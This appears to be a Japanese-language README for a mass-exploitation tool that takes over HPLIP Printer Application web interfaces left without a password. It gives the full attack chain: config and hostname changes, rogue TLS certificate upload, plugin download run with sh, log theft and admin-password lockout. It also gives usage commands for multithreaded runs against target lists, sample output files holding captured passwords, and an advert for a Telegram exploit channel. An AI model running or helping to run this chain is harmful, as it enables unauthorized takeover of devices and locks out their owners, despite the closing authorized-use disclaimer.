
HPLIP < 3.26.6 — PAPPL Webインターフェース経由の完全な管理者乗っ取り(認証不要)。CVE-2026-91097からCVE-2026-91106に関連(CVSS 9.3)
🔬 最新の脆弱性リサーチとエクスプロイトリリースについてはTelegramに参加してください
HPLIP Printer Application(PAPPLベースのWebインターフェース)の3.26.6より前のすべてのバージョンを対象とした大量エクスプロイトツール。このツールは、PAPPL Webインターフェースのデフォルトの認証不要状態を悪用して、完全な管理者乗っ取りチェーンを実行します。設定改ざん、ホスト名変更、TLS証明書の置き換え、HPプラグインのインストール(ターゲット上で.runファイルのシェル実行をトリガー)、システムログの窃取、管理者パスワードのロックアウトなどです。
中核となる脆弱性はPAPPLの認証不要の管理アクセスです — HPLIP Printer Applicationはデフォルトでパスワードが設定されていない状態で出荷されるため、任意のネットワーク攻撃者がWebインターフェース(通常はポート8000)を通じて認証なしで全ての管理操作を実行できます。
さらに、プラグインインストールチェーンは以下で対処された弱点を悪用します:
| CVE | CWE | CVSS 4.0 | 関連性 |
|---|---|---|---|
| CVE-2026-91097 | CWE-94 / CWE-787 | 7.0 | plugin.specのパストラバーサル — このツールによってトリガーされるプラグインインストールは、脆弱なpluginhandler.pyコードを通過します |
| CVE-2026-91102 | CWE-78 / CWE-494 | 8.4 | 整合性チェックなしのダウンロード — プラグインの.runファイルはHTTP経由でダウンロードされ、ターゲット上でshによって実行されます |
HPセキュリティ速報: HPSBPI04151
ターゲット探索
│
▼
HPLIP Printer Applicationの検出(Serverヘッダー+バージョン)
│
▼
認証状態の確認(/security)
│
├── パスワード設定済み ──► VULNとして記録(ロック済み)
│
└── パスワードなし(デフォルト) ──► エクスプロイトチェーン:
│
├── 1. 設定の変更(/config)
│ dns_sd_name, location, organization, contact_name
│ 検証済み:マーカーがレスポンスに反映
│
├── 2. ホスト名の変更(/network)
│ 旧ホスト名を取得、新ホスト名を設定
│ 検証済み:新しい値がレスポンスに反映
│
├── 3. TLS証明書のアップロード(/tls-install-crt)
│ カスタムPEM証明書+秘密鍵
│ マルチパートファイルアップロード
│
├── 4. HPプラグインのインストール(/plugin)
│ ステップ1:POST action=install-plugin(.runをダウンロード)
│ ステップ2:POST action=license-accepted(shで実行)
│ ⚠ CVE-2026-91097 + CVE-2026-91102
│
├── 5. ログファイルの読み取り(/logfile.txt)
│ システムパス、環境情報、Snapパス
│
└── 6. 管理者パスワードの設定(/security)
以降の認証不要アクセスをロックアウト
完全な管理者乗っ取りを完了
pip install requests
**Python 3.8+**が必要です。その他の依存関係はありません。
python T.py targets.txt 50
| 引数 | 説明 | デフォルト |
|---|---|---|
targets.txt | ターゲットリストを含むファイル(1行に1つ) | プロンプト表示 |
50 | 同時スレッド数 | 15 |
python T.py
ツールはターゲットリストファイルとスレッド数の入力を求めます。
192.168.1.100:8000
https://10.0.0.1:8000
http://printer.local:8000
192.168.1.100
printer.example.com
8000になります#で始まる行は無視されますAdminS.txthttp://192.168.1.100:8000 | v3.22.10 | password=Nx-zD_buovl6wko0 | server=HPLIP_Printer_Application/3.22.10-13 PAPPL/1.4.9 | panel=http://192.168.1.100:8000/ | security=http://192.168.1.100:8000/security | config=http://192.168.1.100:8000/config | ...
Nx_modify.txthttp://192.168.1.100:8000/config | v3.22.10 | type=CONFIG | verified=true | dns_sd_name: 'HPLIP Printer Application' -> 'HPLIP [marker]' | location: '' -> 'Nxploited-marker'
http://192.168.1.100:8000/network | v3.22.10 | type=HOSTNAME | verified=true | old=ORIGINAL-HOST.local | new=nx-abc123
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
██████ ██ ██ ██
██ ███ ██ ██ ██
██ ██████ ███
██ █████ ██ ██
██ ████ ██ ██
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
HPLIP Printer Application │ 管理者乗っ取り + 完全制御
影響を受ける < 3.26.6 │ PAPPL 認証不要アクセス
CVE-2026-91097 │ プラグインパストラバーサル
CVE-2026-91102 │ 整合性チェックなしのプラグインダウンロード + シェル実行
Web経由で悪用: /security /config /network /plugin /tls-install-crt /logs
By: Nxploited ( Khaled Alenazi ) │ Telegram: @Kxploit
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
targets=4 threads=4
00:11:34 [CUPS ] http://192.168.1.100:8000 Server: HPLIP_Printer_Application/3.22.10-13
00:11:34 [VER ] http://192.168.1.100:8000 v3.22.10 < 3.26.6 AFFECTED
00:11:35 [PROBE ] http://192.168.1.100:8000 v3.22.10 | NO AUTH | exploiting...
00:11:36 [CFG ] http://192.168.1.100:8000 CONFIG MODIFIED | marker=abc12345
00:11:37 [NET ] http://192.168.1.100:8000 HOSTNAME 'OLD-HOST.local' -> 'nx-xyz789'
00:11:38 [CERT ] http://192.168.1.100:8000 TLS CERT UPLOADED | marker=abc12345
00:12:03 [PLG ] http://192.168.1.100:8000 PLUGIN | freshly_installed | shell_exec=True
00:12:05 [LOG ] http://192.168.1.100:8000 logfile.txt | 19083B | env=/var/snap/hplip-printer-app/
00:12:05 [ADMIN ] http://192.168.1.100:8000 PASSWORD SET | pw=Nx-zD_buovl6wko0
00:12:05 [HIT ] http://192.168.1.100:8000 v3.22.10 + CONFIG + HOSTNAME + CERT + PLUGIN + LOGS + ADMIN
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
DONE 4/4 █ HIT=4 █ VULN=0 █ SAFE=0 █ SKIP=0
▐ Admin Takeover: 4 └─ AdminS.txt
▐ Modifications : 8 └─ Nx_modify.txt
▐ Cert Uploads : 4 └─ Nx_upload.txt
▐ Plugin Exec : 1 └─ Nx_plugin.txt
▐ Recon / Info : 8 └─ Nx_recon.txt
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
| タグ | 意味 |
|---|---|
HIT | 悪用に成功 — 管理者乗っ取りを達成 |
VULN |
/var/snap/hplip-printer-app/common/以下に保存されますsh plugin.run --keep --nox11をトリガーし、HPの公式プラグインバイナリを実行します — コンテンツはHPサーバーからダウンロードされるため、攻撃者はプラグインのコンテンツを制御できませんが、その実行をトリガーしますBy: Nxploited
このツールは、許可されたセキュリティリサーチ、ペネトレーションテスト、および教育目的のみに厳密に提供されています。システム所有者からの明示的な書面による許可なしにこのツールをシステムに対して使用することは、違法かつ非倫理的です。作者は、このツールの使用から生じるいかなる誤用、損害、または法的結果についても責任を負いません。セキュリティ評価を実施する前に、必ず適切な許可を取得してください。このツールを使用することにより、あなたは自身の行動および適用されるすべての法律と規制の遵守について単独で責任を負うことに同意するものとします。
| エンドポイント | アクション | 検証済み |
|---|
/security | 管理者パスワードの設定(アカウント乗っ取り) | ✅ |
/config | DNS-SD名、場所、組織、連絡先の変更 | ✅ |
/network | システムホスト名の変更 | ✅ |
/tls-install-crt | 任意のTLS証明書+秘密鍵のアップロード | ✅ |
/plugin | HPプラグインのダウンロード+ライセンス同意+インストールのトリガー(shで.runを実行) | ✅ |
/logfile.txt | アプリケーションログファイル全体の読み取り(情報漏洩) | ✅ |
| ファイル | 内容 |
|---|
AdminS.txt | 管理者乗っ取り — パスワード、サーバーバージョン、完全なパネルURLマップ |
Nx_modify.txt | 検証済みの設定およびホスト名の変更(旧 → 新の値) |
Nx_upload.txt | TLS証明書アップロードの確認 |
Nx_plugin.txt | シェル実行ステータスを含むHPプラグインインストール結果 |
Nx_recon.txt | 情報漏洩 — ログファイルサイズ、環境パス、バージョン |
| 脆弱だがパスワードが既に設定済み(ロック済み) |
SAFE | バージョン ≥ 3.26.6(修正済み) |
SKIP | HPLIP Printer Applicationではない、または到達不能 |